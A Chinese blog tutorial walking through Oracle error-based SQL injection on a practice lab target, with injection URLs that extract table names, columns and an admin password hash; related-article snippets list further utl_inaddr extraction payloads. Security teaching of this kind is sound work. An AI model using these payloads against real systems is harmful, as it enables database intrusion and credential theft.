oracle报错注入

最新推荐文章于 2024-04-12 13:04:35 发布
最新推荐文章于 2024-04-12 13:04:35 发布
阅读量2.2k 收藏
点赞数
分类专栏: 渗透测试 文章标签: web安全 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45713467/article/details/121548111
版权

Oracle报错注入原理
通过ctxsys.drithsx.sn(user,查询语句)函数来根据页面报错获取我们需要的内容
注意事项:
1.oracle数据库在查询时,必须写表名,如果表不存在可以使用虚表 dual
2.Oracle数据库的字段数据类型是强匹配,必须保持数据类型相同
3.Oracle系统表 all_tables、user_tables、all_tab_columns、user_tab_columns
4.oracle限制查询结果返回的数量用rownum

靶场:http://59.63.200.79:8808/?id=1
拿表名
http://59.63.200.79:8808/?id=1 and 1=ctxsys.drithsx.sn(‘user’,(select table_name from (select table_name,rownum r from user_tables) where r=3))

发现Admin,news,md5 三个表
拿admin中的字段
http://59.63.200.79:8808/?id=1 and 1=ctxsys.drithsx.sn(‘user’,(select column_name from (select column_name,rownum r from user_tab_columns) where r=2))
发现UNAME,UPASS,MD5等字段,我们拿UPASS中的数据

http://59.63.200.79:8808/?id=1 and 1=ctxsys.drithsx.sn(‘user’,(select upass from (select upass,rownum r from admin) where r=2))
拿到数据

2a61f8bcfe7535eadcfa69eb4406ceb9

笔墨稠思
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Oracle-报错注入
weixin_45634365的博客
03-05 488
一、Oracle数据库简介 Oracle数据库系统,是美国ORACLE公司(甲骨文)提供的以分布式数据库为核心的一组软件产品,是一种关系数据库,数据库体量较大,一般与jsp网站联合。 常见的数据库:MySQL、MSSQL、Access、Oracle Oracle使用免费,但如果使用中的数据库遇到了问题,例如数据丢失、数据库打不开等等,想要解决问题,就必须寻找Oracle官方的服务,而服务价格不菲,而这就是Oracle的盈利方式。 Oracle比MySQL、MSSQL、Access更为先进,对大数据的处理能力
SQLmap注入工具
09-20
3)基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4)联合查询注入,可以使用union的情况下的注入。 5)堆查询注入,可以同时执行多条语句的执行时的注入。 比较实用的sql注入...
kettle连接Oracle报错
12-14
kettle连接Oracle报错kettle连接Oracle报错报错信息 kettle连接Oracle报错 报错信息 错误连接数据库 [aaa] : org.pentaho.di.core.exception.KettleDatabaseException: Error occurred while trying to connect to the database Error connecting to database: (using class oracle.jdbc.driver.OracleDriver) Listener refused the connection with th
oracle报错提示原因及解决
E=mc²
07-26 474
oracle 提示"无效字符"------------一般来说是哪里多了分号 ";"
干货 Oracle注入和漏洞利用姿势总结
最新发布
2401_84187635的博客
04-12 324
if ‘SMITH’ in res.text: # 为真时,即判断正确的时候的条件。(img-kmpW0H3S-1712898206497)](img-WvSzEJXT-1712898206497)](img-gC5fie7O-1712898206498)](img-lNMktoxz-1712898206498)]到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。– 授予相关 Java 权限。– 撤销相关 Java 权限。– 发起 HTTP 请求。– 发起 DNS 请求。
Oracle数据库--报错注入
Y22Lee的博客
04-01 916
SQL报错注入就是利用数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。dual 是Oracle库中特有的一个单行单列的虚拟表,Oracle中的一个实际存在的表,任何用户均可读取,常用在没有目标表的Select语句块中。Oracle中弱化了库的概念,用户被强化,即:通俗的讲一个用户一个库。利用子查询和别名,将数据的编号固定住,这样修改r的值即可取出对应的第几条数据。r=1取第一条数据,r=2取第二条数据。利用子查询和别名,将数据的编号固定住,这样修改r的值即可取出对应的第几条数据。
14-Web安全——基于Oracle的联合注入,报错注入,盲注
网络安全
07-16 1178
目录 1. 基于ORACLE的sql注入 2. 联合注入 3. 报错注入 1. 基于ORACLE的sql注入 ORACLE是一个关系型数据库,一般会在用户下面生成自己的数据库表,它没有数据库的概念,每个登陆的用户都会有属于自己独立的数据库,不同用户看到的数据库表也不同。 举个例子,如果使用不同用户登陆ORACLE数据库的话,就会看到属于当前用户的数据库: 例如,如果使用ORACLE的系统管理员system用户登陆会看到很多的数据库表,并且这些数据库表只有在登陆system...
Oracle注入——报错注入
m0_55854679的博客
02-19 2584
SQL注入之重新认识 文章目录Oracle数据库dual表数据库语句报错注入函数解析练习 Oracle数据库 一般大公司用的多,很贵,环境搭建复杂且大,数据库死板,非常讲究语法格式,区分大小写,数据类型很多。dual虚表,专门用来满足oracle数据库严格的语法格式,为凑格式所存在。一般数据库强调库、表名、字段、内容,但Oracle数据库种库被弱化,用户被强化,一个用户代表一个库。 dual表 Dual是一个实表(也有人说它是虚表),如果你直接查询它,它只显示一个X,列名为DUMMY,那么要它有什么用呢?
Oracle爆错手工注入.doc
04-05
手工注入方式,利用报错注入 Oracle
Oracle -- 报错注入
qq_68233961的博客
08-21 880
Oracle -- 报错注入
Oracle注入--报错注入
weixin_52351575的博客
10-02 836
一般大公司用的多,很贵,环境搭建复杂且大,数据库死板,非常讲究语法格式,区分大小写,数据类型很多。dual虚表,专门用来满足oracle数据库严格的语法格式,为凑格式所存在。一般数据库强调库、表名、字段、内容,但Oracle数据库种库被弱化,用户被强化,一个用户代表一个库。
超级SQL注入工具,支持布尔盲注,报错盲注,union注入等
03-27
超级SQL注入工具目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
Sqlmap使用手册中文版
01-13
基于报错注入 联合查询注入 堆叠注入 Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、...
sqlmap v1.8 最新版
03-05
Sqlmap 是一个自动化的 SQL 注入...基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 联合查询注入,可以使用union的情况下的注入。 堆查询注入,可以同时执行多条语句的执行时的注入
网络安全零基础入门(第六章-5)Oracle注入——报错注入
素笺
04-09 186
每日一句:没有学不会的东西,只有不努力的man 本篇内容:注入函数解析      报错注入+联合查询(union all)      实战注意 一、注入函数解析 1.提示:     Oracle注入比较麻烦,有点小难要有心理准备,原因是Oracle数据库本身比较复杂           2.报错注入原理     报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的。          ...
19、注入篇--报错注入Oracle
WX公众号-小白学安全
04-10 685
Oracle概述 1、Oracle数据库属于甲骨文公司,关系型数据库管理系统,数据库 2、讲究语法严谨 select 字段名 from 表名 3、dual表—>虚表 专门用于满足数据库语句结构的表 大部分数据库是数据敏感大小写,语句是不敏感大小写 4、Oracle系统自带表: 没有库的概念,只有用户的概念 查询出所有的表: select from all_tables 查询用户所创建的表:select from user_tables 查询所有的字段:select from all_tab_colum
【学习笔记】Oracle报错注入
chualam的博客
11-17 214
||utl_inaddr. get_host_name id=1||utl_inaddr. get_host_name((select banner from v$version where rownum=1)) 爆数据库版本 id=1||utl_inaddr. get_host_name((select owner from all_tables where rownum=1)) 爆库名 id=1||utl_inaddr. get_host_name((select owner from all_tabl
Oracle显错注入函数
weixin_33970449的博客
07-04 289
Oracle包utl_inaddr  作用:用于取得局域网或Internet环境中的主机名和IP地址。  1、utl_inaddr.get_host_address 环境中IP地址  如果查询失败,则提示系统错误  查询的IP地址  select UTL_INADDR.get_host_address('www.qq.com') from dual;  查询本机IP地址  s...
oracle注入报错500
05-26
Oracle注入报错500一般表示服务器端出现了内部错误,可能与注入攻击有关,但也可能是其他原因导致的。要解决此问题,可以尝试以下步骤: 1. 检查注入语句是否正确,是否存在语法错误或拼写错误等问题。 2. 检查注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

笔墨稠思

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值